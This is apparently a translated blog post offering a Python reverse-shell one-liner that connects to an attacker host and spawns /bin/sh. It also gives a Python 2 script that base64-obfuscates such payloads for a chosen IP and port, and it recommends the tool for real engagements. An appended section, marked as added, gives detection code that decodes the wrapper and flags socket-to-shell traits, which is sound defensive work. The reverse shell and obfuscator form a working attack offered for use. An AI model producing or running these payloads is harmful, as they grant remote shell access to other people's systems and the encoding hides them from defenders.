Address: https://github.com/donghouhe/python_fantan_shell_encode/blob/master/netcat_encode.py If you think it's good, give it a star as encouragement.
This is the original command.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Once run, a shell bounces back to the attacker's computer.
But it doesn't look flashy enough ... you know what I mean?
So I base64-encoded the code to make it look cooler. Here is the finished script:
'''
date: 2015.2.2
Author: (ASCII-art banner, garbled in extraction)
'''
# Python 2 script (print statement, base64.encodestring)
from base64 import encodestring
from sys import argv
try:
    # argv[1] is the IP, argv[2] is the port; newlines in the base64 text are escaped as \n
    print "python -c \"exec(__import__('base64').decodestring(", '\'' + encodestring("s=__import__('socket').socket(__import__('socket').AF_INET,__import__('socket').SOCK_STREAM);s.connect(('{}',{}));__import__('os').dup2(s.fileno(),0);__import__('os').dup2(s.fileno(),1);__import__('os').dup2(s.fileno(),2);p=__import__('subprocess').call(['/bin/sh','-i'])".format(argv[1], argv[2])).replace('\n', '\\n') + '\'', "))\""  # = I couldn't use str1 + str2
except:
    print 'usage:python nc.py IP Port'
It's something of a payload.
Screenshots show the effect.
It is indispensable in real engagements.
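For defenders, the wrapper this script emits stands out in process-creation logs. The following is an added example (not part of the original post or the linked repository) that decodes the base64 argument of such a command line and checks the decoded text for socket-to-shell traits; `inspect_cmdline`, `sample_cmdline` and the sample command line are constructed for illustration.

```python
import base64
import binascii
import re

# Wrapper emitted by the generator above; decodebytes/b64decode are assumed
# Python 3 spellings of the same call, added for coverage.
WRAPPER = re.compile(
    r"exec\s*\(\s*__import__\s*\(\s*['\"]base64['\"]\s*\)\s*\."
    r"(?:decodestring|decodebytes|b64decode)\s*\(\s*['\"]([^'\"]+)['\"]")
# Traits of a socket wired to an interactive shell, checked on the decoded text.
INDICATORS = {
    "socket": re.compile(r"\bsocket\b"),
    "connect": re.compile(r"\.connect\s*\("),
    "dup2": re.compile(r"\bdup2\s*\("),
    "shell": re.compile(r"/bin/(?:ba)?sh\b"),
}
PEER = re.compile(r"connect\s*\(\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)")

def inspect_cmdline(cmdline):
    """Return None when no base64-exec wrapper is present, else a finding dict."""
    m = WRAPPER.search(cmdline)
    if not m:
        return None
    # The generator escapes line breaks as a literal backslash-n; drop them.
    blob = re.sub(r"\\n|\s", "", m.group(1))
    try:
        decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return {"verdict": "undecodable", "hits": [], "peer": None, "decoded": None}
    hits = sorted(k for k, rx in INDICATORS.items() if rx.search(decoded))
    peer = PEER.search(decoded)
    return {
        "verdict": "reverse-shell" if len(hits) == len(INDICATORS) else "encoded-exec",
        "hits": hits,
        "peer": (peer.group(1), int(peer.group(2))) if peer else None,
        "decoded": decoded,
    }

def sample_cmdline(code):
    """Constructed log sample: wrap `code` the way the generator's output looks."""
    b64 = base64.encodebytes(code.encode()).decode().replace("\n", "\\n")
    return "python -c \"exec(__import__('base64').decodestring( '%s' ))\"" % b64

# Constructed payload text; 192.0.2.10 is a documentation-range address.
SAMPLE = sample_cmdline(
    "s=__import__('socket').socket();s.connect(('192.0.2.10',1234));"
    "__import__('os').dup2(s.fileno(),0);"
    "p=__import__('subprocess').call(['/bin/sh','-i'])")
```

A verdict of `encoded-exec` means the wrapper was present but the decoded text lacked the full set of traits; it still merits review, since legitimate tooling rarely passes base64 to `exec` on the command line.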
"Python" Let me code a sentence for the shell to bounce.